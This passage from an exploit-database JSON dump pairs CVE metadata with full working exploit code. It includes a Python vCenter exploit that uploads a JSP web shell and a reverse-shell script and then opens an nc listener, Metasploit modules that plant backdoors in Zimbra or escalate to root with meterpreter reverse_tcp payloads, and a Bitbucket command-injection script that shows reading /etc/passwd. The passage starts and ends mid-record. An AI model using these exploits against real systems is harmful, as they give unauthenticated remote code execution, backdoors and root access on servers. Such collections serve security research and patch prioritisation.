\npayload_file=tarfile.open('payload.tar','w') \nmyroute=getpath() \ngetprompt('Adding web backdoor to archive') \npayload_file.add(\"shell4.jsp\", myroute) \nmyroute=getpath(\"tmp/reverse.sh\") \ngetprompt('Adding bash backdoor to archive') \npayload_file.add(\"reverse.sh\", myroute) \npayload_file.close() \n# cleaning up a little bit \nos.unlink(\"reverse.sh\") \nos.unlink(\"shell4.jsp\") \ngetprompt('Backdoor file just was created.') \n \ndef launchexploit(ip): \nres=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) \nif res.status_code == 200 and res.text == 'SUCCESS': \ngetprompt('Backdoor was uploaded successfully!') \nreturn True \nelse: \ngetprompt('Backdoor failed to be uploaded. Target denied access.') \nreturn False \n \ndef testshell(ip): \ngetprompt('Looking for shell...') \nshell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\" \nres=requests.get('https://' + ip + shell_path, verify=False, timeout=60) \nif res.status_code==200: \ngetprompt('Shell was found!.') \nresponse=res.text \nif True: \ngetprompt('Shell is responsive.') \ntry: \nresponse=re.findall(\"b>(.+)</\",response)[0] \nprint('$>uname -a') \nprint(response) \nexcept: \npass \nreturn True \nelse: \ngetprompt('Sorry. Shell was not found.') \nreturn False \n \ndef opendoor(url): \ntime.sleep(3) \ngetprompt('Executing command.') \nrequests.get(url, verify=False, timeout=1800) \n \ndef executebackdoor(ip, localip): \nurl=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\" \nt=threading.Thread(target=opendoor,args=(url,)) \nt.start() \ngetprompt('Setting up socket '+localip+':443') \nos.system('nc -lnvp 443') \n \nif len(sys.argv)== 1: \nmyargs.print_help(sys.stderr) \nsys.exit(1) \ncreatebackdoor(args.local) \nuploaded=launchexploit(args.target) \nif uploaded: \ntested=testshell(args.target) \nif tested: \nexecutebackdoor(args.target, args.local) \ngetprompt(\"Execution completed!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163268/vmwarevcenter70-exec.txt"}], "zdt": [{"lastseen": "2023-06-03T16:28:41", "description": "This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on Zimbra Collaboration Suite Network Edition versions 9.0.0 Patch 23 and below as well as Zimbra Collaboration Suite Network Edition versions 8.8.15 Patch 30 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "zdt", "title": "Zimbra Zip Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-25T00:00:00", "id": "1337DAY-ID-37925", "href": "https://0day.today/exploit/description/37925", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:04:51", "description": "This Metasploit module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T00:00:00", "type": "zdt", "title": "Zimbra zmslapd Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "1337DAY-ID-37907", "href": "https://0day.today/exploit/description/37907", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37907", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:00:33", "description": "This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-07T00:00:00", "type": "zdt", "title": "Zimbra UnRAR Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-07T00:00:00", "id": "1337DAY-ID-37894", "href": "https://0day.today/exploit/description/37894", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n print_warning('Could not determine the public web path, disabling payload triggering')\n return\n end\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37894", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:10:33", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-23T00:00:00", "type": "zdt", "title": "Bitbucket v7.0.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-23T00:00:00", "id": "1337DAY-ID-38290", "href": "https://0day.today/exploit/description/38290", "sourceData": "# Exploit Title: Bitbucket v7.0.0 - RCE\n# Exploit Author: khal4n1\n# Vendor Homepage: https://github.com/khal4n1\n# Tested on: Kali and ubuntu LTS 22.04\n# CVE : cve-2022-36804\n\n#****************************************************************#\n#The following exploit is used to exploit a vulnerability present\n#Atlassian Bitbucket Server and Data Center 7.0.0 before version\n#7.6.17, from version 7.7.0 before version 7.17.10, from version\n#7.18.0 before version 7.21.4, from version 8.0.0 before version\n#8.0.3, from version 8.1.0 before version 8.1.3, and from version\n#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1\n\n#Usage Example\n\n# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'\n\n# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'\n\n#The server will send a 500 http response with the stout output from the\n# command executed.\n\n\n#****************************************************************#\n\n#!/usr/bin/python3\n\nimport argparse\nimport urllib\nfrom urllib import request\nimport re\n\n#argument setup\nparser = argparse.ArgumentParser(description='Program to test\nbitbucket vulnerability CVE-2022-36804')\nparser.add_argument(\"--url\", help=\"Set the target to attack.\n[REQUIRED]\", required=True )\nparser.add_argument(\"--cmd\", help=\"Set the command to execute.\n[DEFAULT ID]\", required=True, default='id')\nargs = parser.parse_args()\ncmd= urllib.parse.quote(args.cmd)\n\n\n#reads from the public repository what is available\nrequ = request.urlopen(args.url+ \"/repos?visibility=public\")\nresponse = requ.read()\n\n#select a public project and stores it in a variable\nproject = re.findall('7990/projects/(.*)/repos/',\nstr(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]\n\n#Selects a public repo and stores it in a vatiable\nfile = re.findall('/repos/(.*)/browse',\nstr(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]\n\n# Exploitation\ntry :\n attack = request.urlopen(args.url +\n\"/rest/api/latest/projects/\" + project + \"/repos/\" + file +\n\"/archive?prefix=ax%00--exec=%60\"+cmd+\"%60%00--remote=origin\")\n print (attack.response())\nexcept urllib.error.HTTPError as e:\n body = e.read().decode() # Read the body of the error response\n print (body)\n", "sourceHref": "https://0day.today/exploit/38290", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T16:28:30", "description": "Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T00:00:00", "type": "zdt", "title": "Bitbucket Git Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-23T00:00:00", "id": "1337DAY-ID-37985", "href": "https://0day.today/exploit/description/37985", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Bitbucket Git Command Injection',\n 'Description' => %q{\n Various versions of Bitbucket Server and Data Center are vulnerable to\n an unauthenticated command injection vulnerability in multiple API endpoints.\n\n The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint\n creates an archive of the repository, leveraging the `git-archive` command to do so.\n Supplying NULL bytes to the request enables the passing of additional arguments to the\n command, ultimately enabling execution of arbitrary commands.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'TheGrandPew', # discovery\n 'Ron Bowes', # analysis and PoC\n 'Jang', # testanull - PoC\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],\n [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],\n [ 'URL', 